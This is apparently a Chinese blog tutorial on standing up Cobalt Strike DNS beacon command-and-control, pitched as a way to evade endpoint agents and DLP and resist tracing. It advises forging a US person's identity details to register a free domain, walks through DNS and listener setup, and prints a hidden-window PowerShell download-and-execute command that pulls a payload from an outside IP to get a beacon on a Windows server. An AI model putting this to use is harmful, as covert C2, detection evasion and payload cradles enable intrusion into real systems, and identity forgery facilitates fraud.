前言
实际意义:红蓝对抗中,可以通过DNS的方式通信,流量更加隐秘,躲避agent/DLP的检测,实现相对隐秘的渗透方式,反溯源。
环境:vps(linux)注意这里有个雷区,需要打开53端口的TCP和UDP,截个图大家看看,这个地方我踩哭了,因为新手一直以为是TCP,结果因为没开UDP,导致一直不成功。
前期思路准备:
1、国外域名
2、cobaltstrike 3.3
3、国外代理
域名和解析域名服务器的免费申请和配置
1、挂上代理,去国外免费域名网站找一个域名注册
2、然后点击免费获取,然后接着往下走
3、这里需要注意,因为ip检查,可能正常的瞎填信息无法获取订单,首先去查ip网站确定我们代理的具体位置
4、这里是美国地区,所以伪造一个美国人的身份信息,利用美国人身份生成网站,同理,如果你是德国地区,去找一个伪造德国人身份的网站就行了。接着输入,我们刚刚查到的州名字
5、将获得的信息填入订单信息中,然后提交,这样应该不会报错
6、接着进入自己的域名区域
7、可以看到多了一个
8、打开dns解析的服务器,注册一个号,添加域名,他会提醒你要修改原服务器的ns,所以改一下,不然没用了
①点管理域
②在管理工具中的NamesServers中点击自定义服务器名,这样就完成了,可以解析了
9、就可以看到解析成功了
10、绕了一路终于到了设置解析了
11、接着在vps中打开teamserver,就可以连接了
DNS beacon cs上线
其实只要前面的步骤都做对了,后面的操作就比较基础了
1、支持命令行切换到该模式:mode dns,将http通信方式,改为使用dns的a记录方式进行通信(传输数据小),下面和上面的差不多
2、同上,mode dns-txt只是改为使用dns的txt方法进行通信(传输数据大)有效负载使用dns txt记录下载和分级混合http和dns beacon
首先打开监听,然后按照图片设置,默认是53端口
景象会是这样的
可以用lsof查看53端口是否打开
接着用dig +trace来看看是否走的通
内容过长,只看重点
这就成功了,接着我们生成一个web传递试试效果
1 | powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://47.99.163.64:80/a'))" |
接着找一个windows 3以上的服务器运行一下就行了
收到一个了一个黑屏的beacon
接着我们可以用sleep 5 或者是checkin,将其回显
我的个人博客
孤桜懶契:http://gylq.gitee.io